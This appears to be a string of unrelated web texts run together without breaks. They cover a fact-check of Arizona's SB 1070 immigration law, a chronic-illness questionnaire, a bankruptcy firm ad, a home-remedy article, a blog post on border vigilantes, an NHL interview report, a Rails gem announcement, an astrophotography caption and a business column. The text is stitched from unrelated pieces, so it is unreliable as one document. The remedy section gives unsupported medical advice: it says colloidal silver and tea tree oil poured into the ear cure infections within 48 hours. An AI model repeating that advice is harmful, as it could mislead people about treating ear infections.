Arizona , lacking the authority to deport anyone , will enforce jail sentences laid out in its new law for , say , failing to carry one ’s immigration authorization documents or soliciting day work by the side of the road , said Mary Giovagnoli , director of the Immigration Policy Center , a pro-immigrants ’ rights group .
While the federal system is far from perfect ( thousands of people are locked up in federal detention centers indefinitely awaiting deportation decisions ) , the addition of new immigration crimes at the state level with jail time attached is n’t the answer , she added .
Some Arizona police chiefs and other state officials oppose the law , in no small part because of the provision allowing citizens to sue them , as described above .
Fans of that measure see it as a way to get authorities to enforce the law .
But Phoenix Police Chief Jack Harris suggested it ’s at best superfluous in terms of helping local law enforcement combat serious crime .
Harris , April 30 : Proponents of this legislation have repeatedly said that the new law provides a tool for local law enforcement , but I do n’t really believe that that ’s true or accurate .
We have the tools that we need to enforce laws in this state to reduce property crime and to reduce violent crime , to go after criminals that are responsible for human smuggling , to go after criminals that are responsible for those home invasions , kidnappings , robberies , murders .
He and some other Arizona chiefs say the statute could actually hurt their efforts to fight serious crime because they will have to devote time and resources to enforcing the immigration provisions .
The law also will make illegal immigrants who are crime victims or witnesses more leery of cooperating with law enforcement , they predicted .
Perhaps the single biggest reason this law is so controversial is that immigration – like , say , foreign policy – always has been the purview of the federal government .
The feds ’ authority is rooted in Article I , section 8 of the U.S. Constitution , which gives Congress the power to " establish a uniform rule of naturalization . "
As a practical matter , said Kevin Johnson , an immigration law expert and dean of the University of California at Davis School of Law , it ’s unworkable for states to have their own immigration laws , " just like states ca n’t have their own foreign policies . "
He noted that " the federal government is more inclined to consider the national interest . "
For that reason , Johnson believes that legal challenges to the law – several have already been filed , and the Obama administration is also considering a lawsuit – are likely to succeed under the federal preemption doctrine , which is based on the Constitution ’s Article VI , clause 2 .
Known as the supremacy clause , it says that federal law shall bind " judges in every state " even if state law contradicts it .
At the same time , at least 22 other states are considering legislation similar to Arizona’s .
Does the law allow racial or ethnic profiling ?
There ’s been so much controversy about this question that the legislature went back and amended the law the week after it was signed by the governor .
The final version requires police to try to determine the immigration status of any person who has been stopped , detained , or arrested and " reasonable suspicion exists that the person is an alien . "
Could reasonable suspicion be based on skin color or a Mexican accent ?
Here ’s what it says :
Senate Bill 1070 : A law enforcement official or agency of this state or a county , city , town or other political subdivision of this state may not consider race , color or national origin in implementing the requirements of this subsection except to the extent permitted by the United States or Arizona Constitution .
The unamended version said race et al. , could n’t be the " sole " factors .
But the statute does n’t detail what " reasonable suspicion " might include .
And the phrase " except to the extent permitted " by the federal or state constitutions leaves even more ambiguity , because courts have upheld the use of race or ethnicity in some circumstances .
In an annotated version of the law reprinted by The Arizona Republic , University of Arizona law professor Gabriel Chin writes that there are " many open questions " regarding whether race could be used in enforcing S.B. 1070 .
But he also said , " I am deeply surprised that anyone construes this law to prohibit racial profiling . "
Ediberto Roman , a professor of law at Florida International University , goes even farther .
" It ’s pretext to try to suggest that there is no discriminatory purpose , " he told us .
" Given that there is a lack of any other basis in terms of how they ’re going to enforce it , it ’s pretty clear that we ’re looking to focus on a particular target group . "
Though the law only allows officials to ask for proof of citizenship in the case of " legal stop , detention or arrest , " this does n’t limit the questioning to suspected criminals — it can include those who are detained as victims of or witnesses to a crime , or people accused of violating local ordinances like noise laws or loitering laws .
Roman is concerned that police will be more likely to both stop and to question those who they think look like immigrants .
" The legislature was pretty careful in following criminal procedure notions , but it ’s the discretion in how the law enforcement will use criminal procedure [ that ] is how the racial profiling comes into play , " he said .
Lyle Mann , director of the state government ’s Arizona Peace Officer Standards and Training Board ( AzPOST ) , which provides curricula and standards for law enforcement training , assured us that Arizona ’s law enforcement officials will be instructed in the letter of the law , which prohibits considering race or ethnicity as a factor .
AzPOST is developing a training curriculum for law enforcement departments on how to go about enforcing S.B. 1070 .
The outline for the program shows that AzPOST will be laying out guidelines for what constitutes " reasonable suspicion , " but Mann was n’t able to tell us yet what they will be .
He did say , however , that they would focus on how to avoid profiling while upholding the law .
" While I ca n’t tell you what will be the list of factors for reasonable suspicion , " he said , " I can tell you one factor that will not be listed is race , nationality or ethnicity . "
Still , ultimately individual departments will have control over what they consider " reasonable . "
Mann told us : " Making use of the training is individual agencies ’ decision .
But we happen to believe that everybody will use our product , because it ’s a good product . "
Some of the same criticism that is aimed at state law enforcement on the subject of profiling also can be leveled at the feds .
Under section 287( g ) of the federal Immigration and Nationality Act , state and local officials can be authorized to enforce federal immigration law after receiving four weeks of training .
But listed in the training manual for that program , according to the New York Times , are several factors that authorities can use to begin questioning an individual ’s immigration status that include : " Does the subject have a thick foreign accent or appear not to speak English ? " and " Does the subject ’s appearance look like it is ‘ out of place ’ ? "
According to the Times , federal officials said they were revising the manual and that several other factors must be considered .
The Arizona law also prohibits state or local officials from prosecuting illegal immigration “ to less than the full extent permitted by federal law . ”
As Chin and three other Arizona law professors wrote in a recent report : " Since federal law permits race to be a ‘ relevant factor ’ in determining reasonable suspicion for stops and inquiries , the combined effect of these provisions may be to require state actors to use race to the full extent permitted by federal law . "
According to the Supreme Court case United States v. Brignoni-Ponce , " Mexican appearance " can be a factor justifying an immigration stop .
But 24 years later the Ninth Circuit Court of Appeals , in United States v. Montero - Camargo , ruled that “ Hispanic appearance is not , in general , an appropriate factor ” for determining suspicion , especially in areas with large Hispanic populations .
“ This makes it more complex whether race can be a factor in an immigration stop in the Ninth Circuit ’s jurisdiction , which includes Arizona , ” Johnson told us .
So , does the law allow racial or ethnic profiling ?
It may , though no more than it ’s already allowed under current law .
But that ’s a different question from whether or not such profiling will be used to a greater extent by Arizona law enforcement as a result of the legislation , which remains to be seen .
Sylvia Allen ’s Claims
State Sen. Sylvia Allen , who voted in favor of the bill , wrote a defense of her vote which has been widely forwarded as a chain e-mail .
Some readers have asked us whether Allen is the real author of the piece , because they find the letter ’s many punctuation errors suspicious .
She is , but Allen ’s office told us that an early draft of the piece was leaked , possibly by a family member .
They sent us a corrected version , but the one with errors is already enshrined in the e-mail .
In her piece , Allen cites complaints by Arizona ranchers about violence and vandalism on their property committed by “ illegals . ”
She refers to testimony by several ranchers , who addressed the Arizona Senate on April 13 , 2010 .
But the testimony makes it clear that the violence is not committed by people who try to emigrate to find work , but by gangs who exploit those people to move drugs .
Patrick Bray of the Arizona Cattlemen ’s Association told us that the drug cartels responsible for violence on the Arizona border are not “ immigrants ” – they are headquartered in northern Mexico , but move back and forth across the border for drug trade .
They go 30 or 40 miles into the United States , Bray told us , and then head back south .
They will use would - be immigrants to move drugs across the border under threat , but the gang members themselves are not trying to live or get work in Arizona , which is the situation covered by the new law .
It ’s “ a complete coincidence ” that the law was passed while ranchers were trying to raise awareness of border violence , Bray told us .
The ACA does n’t take a position on the immigration law , Bray said , though its members appreciate the way it ’s drummed up interest in Arizona .
The law addresses a separate issue that may not have any effect on the violence Allen cites .
“ Our focus is completely on border security , ” he said .
“ The law did n’t put any resource or assets on the border , but it certainly has gotten the attention of the nation and this administration . …
We would agree that securing the border is a separate issue from immigration reform [ but ] we do have significant trouble with a very well - organized criminal syndicate down in Mexico . ”
Allen ’s piece conflates border security with immigration law , and undocumented immigrants with Mexico - based criminal organizations .
These are related — the same groups may be involved in smuggling humans and drugs across the border .
But they are not the same thing .
The e-mail has several factual problems , as well .
It says that “ rancher Rob Krantz [ sic ] was murdered by the drug cartel on his home ranch . ”
The leading theory is that he was killed by a drug smuggler , but the circumstances of Robert Krentz ’s death are still under investigation .
And if the theory proves true , this has nothing to do with immigrants living in Arizona .
The piece also references ranchers finding “ Koran bibles , ” but there is no such thing – the Koran and the Bible are different texts .
Bray did tell us that it ’s true that the smugglers are not all of Mexican origin , and said that some were Middle Eastern ( others , he said , are Chinese or Russian ) .
As for the statistic that “ In the last few years 80 % of our law enforcement that have been killed or wounded have been by an illegal , ” an Arizona Department of Public Safety spokesperson told us the department does n’t separate out crimes that have been committed by citizens versus non-citizens .
Allen ’s office told us that she was n’t sure of the statistic ’s provenance .
" We did manage to search out via newspaper and court convictions that 7 of 24 officers who were killed between 1998 and 2008 were killed by illegals , " Allen ’s assistant Karen Winfield said .
" That ’s nearly a third during that time period .
We are also working our way through public testimony that was recorded at hearings here in the Senate to see if we can pick up the 80 percent number there and figure out who said it . "
We would also note , as we have previously , that crime rates were at historic lows in 2008 in Arizona , the most recent year for which figures are available .
The violent crime rate was the lowest since 1971 , while the property crime rate was the lowest since 1966 .
– by Viveca Novak and Jess Henig
Correction , June 4 : We have corrected the name of the state board that provides training for law enforcement officers in Arizona to the Arizona Peace Officer Standards and Training Board .
We were missing the word " Officer " in the original version of this story .
Correction , July 30 : Originally , we transposed the dates in the last sentence of this article about violent and property crime .
We have fixed the error .
Sources
Silverleib , Alan .
" Arizona governor signs changes into immigration law . " CNN.com .
1 May 2010 .
Chin , Gabriel .
Annotated version of SB 1070 .
Arizona Republic .
Accessed 2 Jun 2010 .
Interview with Ediberto Roman , professor of law , Florida International University .
28 May 2010 .
Interview with Lyle Mann , director , Arizona Peace Standards and Training Board .
28 May 2010 .
Arizona Peace Standards and Training Board .
" Law Enforcement Training on Immigration Laws Training Program Outline . "
19 May 2010 .
U.S. Immigration and Customs Enforcement .
" Delegation of Immigration Authority Section 287(g ) Immigration and Nationality Act . "
18 Aug 2008 .
Archibold , Randal C. " Arizona Law Is Stoking Unease Among Latinos . "
The New York Times .
27 May 2010 .
Chin , Gabriel et al .
" Arizona Senate Bill 1070 : A Preliminary Report . " 23 May 2010 .
United States v. Brignoni-Ponce .
422 U.S. 873 . U.S. Supreme Court. 30 Jun 1975 .
United States v. Montero - Camargo .
No. 97-50643 . U.S. 9th Circuit Court of Appeals .
13 May 1999 .
E-mail from Kevin Johnson , dean , University of California at Davis School of Law. 28 May 2010 .
Kelley , Jim .
" State Senator Sylvia Allen responds to SB1070 . "
Tucson Citizen . 1 May 2010 .
Interview with Patrick Bray , Arizona Cattlemen ’s Association .
12 May 2010 .
Francis , David .
" Mexican drug cartels move into human smuggling . "
San Francisco Chronicle .
31 Mar 2008 .
Archibold , Randal C. " Ranchers Alarmed by Killing Near Border . "
The New York Times .
4 Apr 2010 .
Interview with Harold Sanders , Arizona Department of Public Safety .
26 May 2010 .
Karen Winfield , assistant to Arizona State Sen. Sylvia Allen. E-mail sent to FactCheck.org . 1 Jun. 2010 .
Newton , Casey , and Ginger Rough .
" Arizona governor signs bill revising new immigration law . " Arizona Republic .
1 May 2010 .
State of Arizona .
Senate Bill 1070 .
Enacted 23 Apr 2010 , revisions enacted 30 Apr 2010 .
Unlawful employment of aliens .
8 USC sec. 1324a. Accessed 27 May 2010 .
Forms for registration and fingerprinting .
8 USC sec. 1304 .
Accessed 27 May 2010 .
Hsu , Spencer S. " U.S. police chiefs say Arizona immigration law will increase crime . "
Washington Post. 27 May 2010 .
Nowicki , Dan .
" Claims muddle debate over law . " Arizona Republic .
16 May 2010 .
Archibold , Randal C. " Arizona Law Is Stoking Unease Among Latinos . "
The New York Times .
27 May 2010 .
Novak , Viveca et al . " Sunday Replay . " FactCheck.org .
3 May 2010 .
Giovagnoli , Mary , director , Immigration Policy Center .
Interview with FactCheck.org . 3 June 2010 .
1 . The illness I live with is : Lupus , Fibromyalgia , Hypermobility , Hypersensitivity2 .
I was diagnosed with it in the year : Various years , but I 've been getting diagnosed since the age of 17.3 .
But I had symptoms since : Age 8.4 .
The biggest adjustment I ’ve had to make is :
Not working and learning my limits .
5 . Most people assume : I 'm dying .
6 . The hardest part about mornings are : Chronic allergies , confusion from the medication I take before bed .
7 .
My favorite medical TV show is : Nurse Jackie8 .
A gadget I could n’t live without is : Does my Desktop computer count as a gadget ?
Because I 've been attached at the hip with it for a long time .
9 .
The hardest part about nights are : Having to take a nighttime medication to help me get to sleep .
10 .
Each day I take 8 pills & 5 vitamins .
11 .
Regarding alternative treatments
I : Ca n't afford to even think about it .
12 .
If I had to choose between an invisible illness or visible I would choose : Visible - they get all the research and funding .
People believe them !(!!!!) 13 . Regarding working and career : I had a few plans , things I thought about the potential of , and I thought I could still do them and have these illnesses .
I would go into remission , go to work , and get severely ill .
This happened a few different times , until I just had to give it up .
14 .
People would be surprised to know : About my childhood .
15 .
The hardest thing to accept about my new reality has been : Chronic money problems , and the frustration that comes with your mental capacity being greater than physical .
16 .
Something I never thought I could do with my illness that I did was : Moved into a house .
17 .
The commercials about my illness :
Are funny .
18 .
Something I really miss doing since I was diagnosed is : Spending time outdoors , ( and indoors , haha . ) 19 .
It was really hard to have to give up : Working .20 .
A new hobby I have taken up since my diagnosis is : Container gardening .
21 .
If I could have one day of feeling normal again I would : Go to the lake .
22 .
My illness has taught me : Some stuff just is n't worth it .
23 .
Want to know a secret ?
One thing people say that gets under my skin is :
When asked about the scars all over my body , and I respond , " Lupus , " their response is , " I did n't know Lupus could do that ... "
My internal response is , " You probably did n't know anything about Lupus in the first place . " 24 . But I love it when people :
Try to be accommodating without being condescending .
25 .
My favorite motto , scripture , quote that gets me through tough times is : 26 .
When someone is diagnosed I ’d like to tell them : " I know it is rough , but be patient .
Do not stress , remain positive .
( PS Wear sunscreen indoors and out . ) " 27 .
Something that has surprised me about living with an illness is :
It never ends .
28 .
The nicest thing someone did for me when I was n’t feeling well was :
Brought me something yummy to eat or drink , because I 'm too tired to cook for myself .
Or cleaned some of my house for me .
29 .
I ’m involved with Invisible Illness Week because : I want people to know about invisible illnesses .
I want them to get the same attention and research and funding that a lot of well known diseases do .30 .
The fact that you read this list makes me feel : Gratitude .
Find out more about National Invisible Chronic Illness Awareness Week ( Not until September ! )
http://www.invisibleillness.com
Chapter 13 Bankruptcy in Denver
Denver Chapter 13 Bankruptcy Lawyers
Colorado Wage Earners Attorneys
At Mile High Bankruptcy , many of our clients first contact us with the assumption that Chapter 7 bankruptcy is not available for them , and that they 'll have to file for Chapter 13 relief instead .
Our lawyers can show clients how they can qualify for Chapter 7 relief and the faster , more complete discharge it offers .
Sometimes , however , we 'll see a situation where a client can't qualify for Chapter 7 because their household income is too high , even after applying the adjustments .
Even more rarely , a client will need Chapter 13 for other legal reasons .
In these cases , we can provide a free referral to a Chapter 13 attorney .
Call 303.831.0733 for a free consultation about your bankruptcy options
Contact Mile High Bankruptcy in Denver to learn about the relative benefits and disadvantages of Chapter 7 and Chapter 13 bankruptcy .
As experienced attorneys who have concentrated on consumer bankruptcy since the early 1980s , we 're convinced that Chapter 7 is the better approach for most people in Colorado who are considering bankruptcy relief .
Because Chapter 7 is means - tested , the first question has to do with your gross household income — if it's too high , Chapter 7 may not be an available option .
In our experience , however , many clients over the median income can still qualify for Chapter 7 relief , especially if they have child support , tax problems or a high mortgage payment .
Chapter 13 Bankruptcy Attorneys Available
Owning valuable property that exceeds the Colorado bankruptcy exemptions is another factor that might make Chapter 13 a viable option .
If your home equity significantly exceeds $ 60,000 , or if you own nonexempt assets worth more than say , $ 10,000 that you can't bear to part with , Chapter 13 will help you keep nonexempt property while paying its value over the repayment period under a wage - earner 's plan .
This usually represents several hundred dollars each month over a period of three to five years .
Our lawyers can explain your options under both Chapter 7 and Chapter 13 , and in most cases , we 'll find a way to make Chapter 7 work for you .
If Chapter 13 is right for you , we can provide a reliable referral to a Chapter 13 lawyer .
For more information about your bankruptcy alternatives , contact Mile High Bankruptcy in Denver for a free consultation .
We are a debt relief agency .
We help people file for bankruptcy relief under the U.S. Bankruptcy Code .
Common Tags : Denver Filing Chapter 13 Attorneys , Colorado File Bankruptcy Lawyers , Westminster Attorney , CO Lawyer , Questions , Information , Law , Aurora Laws
About the author
( NewsTarget ) Troublesome ear aches and ear infections can usually be relieved in short order with home remedies which include garlic .
Garlic has a natural antibiotic called allicin and it is an essential ingredient in some of the most effective home remedies for ear infections and ear aches .
Garlic can also be used alone and it can be taken orally to speed the recovery from ear and other infections .
One way to obtain garlic oil is to simply take garlic gel capsules and pierce the capsules to get the garlic oil out .
You can also use the juice from freshly minced or crushed garlic and you can make your own fresh garlic based oil as follows :
Cut up three or four cloves of garlic .
Place the garlic in a double boiler and cover with an inch of olive oil .
Cover the pot , and warm the oil gently over low heat for one hour .
Strain the oil through a piece of cheesecloth , and store it in a covered glass jar in the refrigerator .
One extremely effective remedy for ear aches and ear infections can be found in the combination of garlic , colloidal silver , tea tree oil , olive oil and apple cider vinegar .
Mix together three drops of tea tree oil with two tablespoons of olive oil , a teaspoon of colloidal silver and a teaspoon of apple cider vinegar .
Warm the mixture slightly and then lie on your side with your head on a towel ( or paper towels ) with the infected or aching ear facing up .
Use an eyedropper to draw up the mixture and then slowly fill your ear to near the top .
Continue to lie on your side for several minutes ; then , take the towel , hold it to your ear , lie on your other side and let the mixture drain out of your ear onto the towel or paper towels .
Repeat two to four times daily .
You should experience immediate relief and complete resolution within 24 - 48 hours .
Note :
If you do not have all of the ingredients , any combination of the ingredients will likely be successful .
Also , oil of oregano can be substituted for the tea tree oil .
You can also ease the pain and pressure of an ear infection with a blend of mullein ( Verbascum densiflorum ) and garlic infused oils .
These oils kill pain and fight bacteria .
Another garlic based remedy combination calls for garlic , apple cider vinegar and honey .
Still another garlic remedy can be made by combining garlic oil or juice in combination with an extraction of juice from mango leaves .
Mango leaf extract can also be used separately as a remedy for earaches and ear infections Notes :
Any remedy placed inside the ear should be warmed to a comfortable temperature first .
One way to warm an ear remedy is to place a glass bottle containing the remedy mixture in a pan of hot water until it is comfortably warm .
Alternatively , one can run hot water from the faucet over the bottle until the desired temperature is reached .
Another warming method is to heat a small amount of the mixture in a steel or silver spoon over an open flame .
A fourth method is to place a bottle with the mixture in your armpit for a few minutes .
People that get a lot of ear infections might actually be allergic to dairy products , egg whites , wheat , peanuts or soy .
Or , their intake of fatty foods may be too high .
If you suspect a punctured or ruptured eardrum do not use home remedies .
Instead see a qualified medical professional .
Sources included : Tony Isaacs , is a natural health author , advocate and researcher who hosts
The Best Years in Life website for those who wish to avoid prescription drugs and mainstream managed illness and live longer , healthier and happier lives naturally .
Mr. Isaacs is the author of books and articles about natural health , longevity and beating cancer including " Cancer 's Natural Enemy " and is working on a major book project due to be published later this year .
He is also a contributing author for the worldwide advocacy group " S.A N.E.Vax .
Inc " which endeavors to uncover the truth about HPV vaccine dangers .
Mr. Isaacs is currently residing in scenic East Texas and frequently commutes to the even more scenic Texas hill country near Austin and San Antonio to give lectures and health seminars .
He also hosts the CureZone " Ask Tony Isaacs - featuring Luella May " forum as well as the Yahoo Health Group " Oleander Soup " and he serves as a consultant to the " Utopia Silver Supplement Company " .
[ Note : Video not really safe for work .
But true . ]
There was a funny smell to the way Arizona 's police - state immigration law was passed -- especially the way factions with ties to white supremacists whipped up the phantom menace of a wave of crime associated with illegal immigration , focusing on the still - unsolved murder of a border rancher named Robert Krentz , even though officially the crime is being laid at the doorstep of Mexican drug cartels -- but even on that score , the truth is unclear at best .
Notably , the Arizona Daily star reports that the chief suspect in the crime lives in the USA , not in Mexico .
Moreover , as Sam Seder acidly observes , the entire claim that crime has skyrocketed in Arizona is so much cattle offal .
In fact , violent crime in Arizona has been steadily declining in recent years .
It kind of makes you wonder , does n't it , why Arizonans -- and particularly the Arizona media , not to mention the national media -- never picked up on the case of Shawna Forde and her gang of rogue Minutemen , who invaded the home of a Latino family near the border in Arizona and shot them , killing the father and his 9 - year - old daughter in cold blood as she pleaded for her life , and wounding the mother -- who managed to get her own gun and shoot back , wounding one of the killers .
Even more incredible , really , is that this 911 call from the wounded mother received so little attention at the time , much less that it did not become a focus of Arizonans fretting about violent crime :
What brings all this into laser focus is what 's actually happening right now on the Arizona border : Latinos ( some of them American citizens bearing blood - soaked birth certificates ) are being shot and killed , and it 's beginning to appear that white vigilantes -- not Mexican drug gangs -- are doing the killing .
The shootings that first raised this likelihood occurred a little over a week ago in Pinal County , where two Latino men who called 911 pleading for help , saying they had been shot , were found dead near a locale where a sheriff 's deputy had reportedly been wounded by drug smugglers on the border ( though many questions remain about that incident as well ) .
Initially , as you can see both from the Arizona Republic report above , as well as from the local TV coverage , the crime was blamed on " drug smugglers . "
But Jill Garvey at Imagine 2050 reports that something far more insidious may be involved :
In addition to shootings of Latinos by Border Patrol agents , there have been mysterious shootings and even murders in Arizona deserts .
Troubling details are emerging that suggest these attacks on Latinos are not drug - related , as often reported , but the work of violent border vigilantes .
In the wake of the uproar over the passage of racist SB 1070 in Arizona , border vigilantes like Barbara Coe and Glenn Spencer , just to name a few , are revving up their anti-immigrant rhetoric .
In a trend that has disturbing parallels , several immigrants were targeted by camouflaged gunmen last week .
And two Latino men were found murdered in the Arizona desert on June 6 .
Mainstream media reports pin the cause squarely on drug smuggling ; however , bloggers who have followed the story continue to uncover suspicious details surrounding the murders .
Foremost of which is that no drugs were found on or near the victims , but an automatic rifle commonly used by border patrol agents was .
Also , the murders occurred within close proximity to the high - profile Pinal County shooting involving sheriff ’s deputy Louie Puroll .
Pinal County ’s Sheriff Babeu is rivaling notorious Sheriff Joe in his quest to publicize his unfair vilification of immigrants .
Perhaps the most disturbing incident occurred on June 12 , as Dee Perez - Scott at Immigration Talk With a Mexican - American reports :
At 5:00 am on Friday , June 12 , five undocumented migrants who had crossed into the United States and were walking through the canyon near Rio Rico , AZ. , were shot at with a high powered rifle by two unidentified white males wearing camouflage clothing .
" The victims claimed no demands were made .
They were just walking and fired upon , ” said Sheriff Antonio Estrada .
Estrada said when the group ran away from the shooters , one of the men , Manuel Esquer Gomez , 45 , from Nogales , Sonora sustained a gunshot wound to the left forearm .
As the group continued to run , the men stumbled upon skeletal remains of what they thought were two people .
Deputies from the Santa Cruz County Sheriff ’s Office , along with a U.S. Border Patrol special response team and air support , responded and found the skeletal remains of one man .
Documents found on the man identified him as Alberto Donato Lopez , 40 , from Puebla , Mexico .
Lopez ’s body was taken to the Pima County Medical Examiner ’s Office in Tucson to determine the cause of death .
“ It is unknown at this time if the deceased was killed or died of natural causes , ” Estrada said .
“ There ’s always a concern that these people could possibly be victims of violence . ”
Estrada said the Border Patrol tracked footprints from the scene of the shooting , but no suspects were found .
“ At this point we do n’t know who they are , ” said Estrada .
“ It ’s perturbing to hear of people with high - powered rifles and camouflage .
It raises some real red flags . ”
Just as disturbing -- and almost certainly not coincidentally -- is the news , from Stephen Lemons at Phoenix New Times , that some of Russell Pearce 's neo -Nazi pals intend to start patrolling the border with weapons :
Pinal County Sheriff Paul Babeu recently announced that " drug cartels " control the area in his county where deputy Louie Puroll was allegedly shot at , and where two men were recently gunned down .
Now Babeu may be getting some assistance from an unwelcome and unsavory source : Vigilantes led by National Socialist Movement member J.T. Ready .
As I blogged back in May , Ready and fellow neo -Nazi Harry Hughes have been going on illegal alien " patrols " in Pinal County 's Vekol Valley , dressed in camouflage and armed with assault rifles .
Now Ready has announced a " Border Ops " alert for this Saturday via his profile on the white supremacist New Saxon site , inviting participants to " bring plenty of firearms and ammo . "
" Camouflage or earth tone clothing [ is ] preferred , " according to the announcement .
" Bandanas , balaclavas , or other identity concealing items are permissible and encouraged . "
Ready 's statement promises that , " This is the Minuteman Project on steroids !
THE INVASION STOPS HERE ! "
Be sure to read the whole thing -- it 's frightening and disturbing and important .
As our good friend Sara Robinson observes at AmericasFuture.org :
First : this a perfect example of how right - wing vigilantism , once permitted , quickly escalates .
The Minutemen were n't uniformed , only casually armed , and careful to cloak their deep racism -- though it tended to leak out at inopportune moments anyway .
Now , because we enabled and tolerated that , we 've got self - proclaimed Nazis down there in full battle dress , carrying military weapons and telling us quite openly that they 're on a mission to cleanse the country of the brown scourge .
If Arizona officials -- already overwhelmed by a situation that they 're getting no federal help in resolving -- do n't find a way to stop these guys , they 're creating the conditions for the paramilitary right - wing scene on their border to become the national breeding ground for a full - on armed militia movement -- a movement that could , in time , endanger the whole country .
Second :
This is also the next step down the road for the state of Arizona as a whole .
They 've put the country on notice that they 're just fine , thank you , with being the State of Hate -- and in doing so , opened the door to the whole national circus of haters .
Ready and his National Socialists are out front of that parade , but you can bet that there 's a long line of acts queuing up to come out to the desert and follow them .
( Note to Gov. Jan Brewer : be careful what you wish for , for you will surely get it . ) ...
This is what we know about hate groups : they are an evil that can only flourish where good people do nothing .
The State of Arizona is now issuing what amount to official engraved invitations to the country 's far - right vigilantes , sovereign citizens , would - be fascists , self - styled " patriots " ( we need to take that word back , seriously ) , and paranoid race warriors .
They cannot be surprised when people like J.T. Ready and his New Saxons take them up on the offer .
And their choice demands a response from everybody in the other forty - nine as well .
No American state has voluntarily chosen to go down this path since the KKK takeover of Indiana and Oregon in the 1920s .
And when hate holds that much state power , the only way it stops is when the voters of Arizona decide they 've had enough , and vote the bastards out of office .
( It 's a great , thoughtful post -- again , be sure to read it all . )
Arizonans have fundamentally turned the situation on it head by indulging in the lowest form of hysteria : by freaking out about crime caused by Latinos , they have in fact unleashed a wave of vigilante crime against those same people .
Even if they do n't already regret this spasm , they will .
Looking to become an expert in your chosen field , with an advanced degree from a top - tier research and educational institution ?
If so , you are in the right place .
For a birthday boy , Gary Bettman was not exactly in a cheery mood on Wednesday night .
The NHL commissioner , celebrating his 58th birthday , spoke with Hockey Night in Canada 's Ron MacLean during the second period of Game 3 of the Stanley Cup final and expressed his frustration with MacLean 's questions about the financial state of several franchises in the NHL .
Bettman said reports of the league 's financial demise have been " greatly exaggerated , " pointing to " five years in a row for good revenues . "
After MacLean referred to a Forbes magazine report that the Carolina Hurricanes are only worth about $ 85 million US , Bettman respectfully said that the report was off the mark .
Bettman then turned his comments to MacLean .
" What I 'm amazed [ at ] , now that we 've run the gamut of this , we 've had a great season , hockey has been terrific , these playoffs are great , we 're seeing a wonderful game — and you just want to tick off franchise after franchise ?
" What inside of you compels you to want to go in that direction ?
Because I do n't believe the viewers are really that interested in the franchise status . "
MacLean responded that it was an issue for the players .
" If that 's the case , you do a disservice to the players and the great performances that are out there , " Bettman said .
" If the players are interested , the players can ask me . "
When MacLean later asked why southern Ontario is not an option for another NHL team , Bettman said he would rather " fix a couple things that we could n't fix a couple of years ago , " in reference to the Winnipeg Jets and Quebec Nordiques .
" I hope our friends in Quebec City and Winnipeg are n't offended , " Bettman said .
" You 'd like to put them further down on the list .
I 'd like to right something we wish did n't happen . "
" I think the players might wonder why you do n't go into southern Ontario , because it could be so profitable , " MacLean said .
" Wait , who are you getting your information from as to what the players are thinking ? "
Bettman said .
" You 're making this up . "
" With everything that we 've been through , and with all of the union situation being uncertain as it is , I do n't think it helps when you interject your view as to what the players want on the players . "
After a brief discussion of the NHL's relationship with the Winter Olympics , the interview wrapped up cordially .
" I know that 's confrontational , but it 's just good to hear you on those subjects , " MacLean said .
" This was n't confrontational at all , " Bettman replied .
As developers we use O/R mappers to pretend our data is stored as objects instead of flat tables .
Unfortunately that abstraction breaks down frequently .
Or as Joel would say :
All non-trivial abstractions , to some degree , are leaky .
One particular leak of O/R mapping is the N + 1 query problem , where the most innocent code can flood your database with hundreds or thousands of queries .
N + 1 queries are easy to overlook during development because we are used to mediocre response time on our development machines with disabled caches and class reloading .
Relief is promised by debug bars like Rack : : Bug and rails - footnotes which include the number of triggered database queries in the HTML of every page coming out of your application .
Unfortunately they also do a million other things we do n't care about .
We wanted something that would alert us of excessive queries , but stays out of our way otherwise .
Enter Query Diet .
Query Diet inserts a tiny , translucent box into the upper right corner of your screen , informing you about the number of queries triggered by the last request and the time spent waiting for the database .
This is Query Diet being happy about 3 requests taking 66ms :
This is Query Diet being angry about 103 requests taking 164ms :
We 're also quiet satisfied with Query Diet 's installation procedure , which goes like this :
config.gem ' query_diet '
That 's it .
No second step required .
Check out Query Diet on github .
NGC 4631 and NGC 4657 are galaxies in Canes Venatici .
We see NGC 4631 ( bottom left ) from the edge , whereas NGC 4656 and NGC 4657 are pair of interactic Galaxies ( top right ) .
This picture is a product of 2 nights on Bohor .
Object NGC 4631 , NGC 4657 , NGC 4656 , some other galaxies Date and Location 6th and 8th June , 2008 , Bohor , Slovenia Exposition 25 x 5 min Camera Canon 350D , Baader mod. , ISO 800 , RAW Optics Orion Optics Europa 20 cm f/4.5 Mount Vixen GP - DX with SS2k Autoguiding SW 80/400 with QHY5 Processed in Iris , Ps SQM 21.22
May 28 , 2010 4 min read
Opinions expressed by Entrepreneur contributors are their own .
Venture capitalists call it " sweat equity " -- the idea that business owners should n't pay themselves a salary while they 're building a business .
I call it working for nothing and being a fool .
When I see owners not paying themselves the full value of their services , I shudder .
Of the more than 6,000 small businesses my company , American Management Services , has worked with , I can't think of a single one that failed because the owner paid himself or herself a decent salary .
The inability to pay yourself is symptomatic of a much deeper financial problem ; it 's should serve as a red flag that your business is not working .
Lack of sales or quality control , bloated overhead and other financial woes are the real reasons you 're not making a salary .
Sweat equity does n't just mask problems in the business ; it also weakens your position as a leader within the organization .
Salary has a huge impact on how your employees perceive you .
The big boss should get the big bucks .
If you reward yourself less than your employees , you undermine your credibility .
You'd be amazed at how many of our clients fight us on this one .
Most business owners underpay themselves .
There 's a pervasive belief among small - business owners that one day they 'll get what they deserve .
These are good people raised with the simple edict that you should work hard , treat people fairly and be patient .
They think if they keep sacrificing , they 'll eventually be able to sell the business and retire .
The sad fact is that there 's often nothing left to sell when the time comes .
Instead of accumulating wealth , they 've slaved at a job for decades just to cover payroll and pay the bills .
The desire to create wealth and live a comfortable existence is n't a crime .
It 's the whole point of entrepreneurship .
It 's what motivates us to make a profit and build a viable business that puts cash into our pockets both now and in the future .
Instead of investing sweat equity , start taking care of yourself first .
Not only is it looking out for No. 1 to pay yourself a reasonable income ; it 's also taking care of business .
Here are a few things to keep in mind :
Always work to make a good salary .
Then cover the expenses .
Not the other way around .
Then cover the expenses .
Not the other way around .
Reward yourself ( but within reason ) .
Here 's a rough formula :
Pay yourself 3 to 4 cents on each dollar of revenue for doing the job of CEO .
Here 's a rough formula :
Pay yourself 3 to 4 cents on each dollar of revenue for doing the job of CEO .
Imagine you were n't in the picture .
Ask yourself how much you 'd pay a general manager to run your business if you had to go away .
That 's the least you should be paying yourself .
Ask yourself how much you 'd pay a general manager to run your business if you had to go away .
